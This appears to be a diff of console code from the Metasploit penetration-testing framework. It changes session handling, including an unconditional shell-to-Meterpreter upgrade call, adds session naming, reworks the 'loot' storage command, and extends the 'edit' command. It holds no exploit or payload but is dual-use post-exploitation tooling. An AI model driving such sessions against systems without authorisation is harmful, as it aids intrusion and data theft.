rescue ::Exception => e
log_error("Error executing script: #{e.class} #{e}")
end
print_status("Session #{sess_id} (#{session.session_host}):")
print_status("Running #{script} on #{session.type} session" +
" #{sess_id} (#{session.session_host})")
begin
session.execute_script(script, *extra)
rescue ::Exception => e
log_error("Error executing script or module: #{e.class} #{e}")
end
ensure
if session.respond_to?(:response_timeout) && last_known_timeout
@ -1441,14 +1437,9 @@ class Core
session.response_timeout = response_timeout
end
begin
if ['shell', 'powershell'].include?(session.type)
session.init_ui(driver.input, driver.output)
session.execute_script('post/multi/manage/shell_to_meterpreter')
session.reset_ui
else
print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
next
end
session.init_ui(driver.input, driver.output)
session.execute_script('post/multi/manage/shell_to_meterpreter')
session.reset_ui
ensure
if session.respond_to?(:response_timeout) && last_known_timeout
session.response_timeout = last_known_timeout
@ -1473,6 +1464,27 @@ class Core
print_line
print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose, :search_term => search_term))
print_line
when 'name'
if session_name.blank?
print_error('Please specify a valid session name')
return false
end
sessions = sid ? session_list : nil
if sessions.nil? || sessions.empty?
print_error("Please specify valid session identifier(s) using -i")
return false
end
sessions.each do |s|
if framework.sessions[s].respond_to?(:name=)
framework.sessions[s].name = session_name
print_status("Session #{s} named to #{session_name}")
else
print_error("Session #{s} cannot be named")
end
end
end
rescue IOError, EOFError, Rex::StreamClosedError
@ -1603,12 +1615,6 @@ class Core
# Set the supplied name to the supplied value
name = args[0]
value = args[1, args.length-1].join(' ')
if (name.upcase == "TARGET")
# Different targets can have different architectures and platforms
# so we need to rebuild the payload list whenever the target
# changes.
@cache_payloads = nil
end
# If the driver indicates that the value is not valid, bust out.
if (driver.on_variable_set(global, name, value) == false)
@ -2264,11 +2270,16 @@ class Core
# Provide valid payload options for the current exploit
#
def option_values_payloads
return @cache_payloads if @cache_payloads
if @cache_payloads && active_module == @previous_module && active_module.target == @previous_target
return @cache_payloads
end
@cache_payloads = active_module.compatible_payloads.map { |refname, payload|
@previous_module = active_module
@previous_target = active_module.target
@cache_payloads = active_module.compatible_payloads.map do |refname, payload|
refname
}
end
@cache_payloads
end

View File

@ -479,7 +479,7 @@ class Db
'SortIndex' => order_by
})
# Sentinal value meaning all
# Sentinel value meaning all
host_ranges.push(nil) if host_ranges.empty?
case
@ -717,7 +717,7 @@ class Db
'SortIndex' => order_by
})
# Sentinal value meaning all
# Sentinel value meaning all
host_ranges.push(nil) if host_ranges.empty?
ports = nil if ports.empty?
@ -1115,7 +1115,7 @@ class Db
def cmd_loot_help
print_line "Usage: loot <options>"
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]"
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]"
print_line " Del: loot -d [addr1 addr2 ...]"
print_line
print_line " -a,--add Add loot to the list of addresses, instead of listing"
@ -1187,34 +1187,38 @@ class Db
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
})
# Sentinal value meaning all
# Sentinel value meaning all
host_ranges.push(nil) if host_ranges.empty?
if mode == :add
if info.nil?
print_error("Info required")
return
end
if filename.nil?
print_error("Loot file required")
return
end
if types.nil? or types.size != 1
print_error("Exactly one loot type is required")
return
end
type = types.first
name = File.basename(filename)
host_ranges.each do |range|
range.each do |host|
file = File.open(filename, "rb")
contents = file.read
lootfile = framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
print_status("Added loot for #{host} (#{lootfile})")
if mode == :add
if host_ranges.compact.empty?
print_error('Address list required')
return
end
if info.nil?
print_error("Info required")
return
end
if filename.nil?
print_error("Loot file required")
return
end
if types.nil? or types.size != 1
print_error("Exactly one loot type is required")
return
end
type = types.first
name = File.basename(filename)
file = File.open(filename, "rb")
contents = file.read
host_ranges.each do |range|
range.each do |host|
lootfile = framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
print_status("Added loot for #{host} (#{lootfile})")
end
end
return
end
return
end
each_host_range_chunk(host_ranges) do |host_search|
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|

View File

@ -26,7 +26,7 @@ module Msf
def commands
{
"back" => "Move back from the current context",
"edit" => "Edit the current module with the preferred editor",
"edit" => "Edit the current module or a file with the preferred editor",
"advanced" => "Displays advanced options for one or more modules",
"info" => "Displays information about one or more modules",
"options" => "Displays global options or for one or more modules",
@ -48,7 +48,6 @@ module Msf
super
@dscache = {}
@cache_payloads = nil
@previous_module = nil
@module_name_stack = []
@dangerzone_map = nil
@ -66,22 +65,26 @@ module Msf
end
def cmd_edit_help
msg = "Edit the currently active module"
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}."
print_line "Usage: edit"
print_line "Usage: edit [file/to/edit.rb]"
print_line
print_line msg
print_line "When done editing, you must reload the module with 'reload' or 'rerun'."
print_line "Edit the currently active module or a local file with #{local_editor}."
print_line "If a file path is specified, it will automatically be reloaded after editing."
print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'."
print_line
end
#
# Edit the currently active module
# Edit the currently active module or a local file
#
def cmd_edit
if active_module
def cmd_edit(*args)
if args.length > 0
path = args[0]
elsif active_module
path = active_module.file_path
end
if path
editor = local_editor
path = active_module.file_path
if editor.nil?
editor = 'vim'
@ -90,11 +93,26 @@ module Msf
print_status("Launching #{editor} #{path}")
system(editor, path)
# XXX: This will try to reload *any* .rb and break on modules
if args.length > 0 && path.end_with?('.rb')
print_status("Reloading #{path}")
load path
else
print_error('Only Ruby files can be reloaded')
end
else
print_error('Nothing to edit -- try using a module first.')
end
end
#
# Tab completion for the edit command
#
def cmd_edit_tabs(str, words)
tab_complete_filenames(str, words)
end
def cmd_advanced_help
print_line 'Usage: advanced [mod1 mod2 ...]'
print_line
@ -638,7 +656,6 @@ module Msf
active_module.datastore.update(@dscache[active_module.fullname])
end
@cache_payloads = nil
mod.init_ui(driver.input, driver.output)
# Update the command prompt

View File

@ -59,8 +59,8 @@ module Msf
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
[
::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
::Msf::Config.script_directory + ::File::SEPARATOR + 'resource',
::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource'
].each do |dir|
res_path = dir + ::File::SEPARATOR + res
if ::File.exist?(res_path)
@ -97,7 +97,7 @@ module Msf
[
::Msf::Config.script_directory + File::SEPARATOR + "resource",
::Msf::Config.user_script_directory + File::SEPARATOR + "resource",
"."
'.'
].each do |dir|
next if not ::File.exist? dir
tabs += ::Dir.new(dir).find_all { |e|

View File

@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver
when "prompt"
update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
when "promptchar"
update_prompt(framework.datastore['Prompt'], val, true)
update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true)
end
end

Some files were not shown because too many files have changed in this diff Show More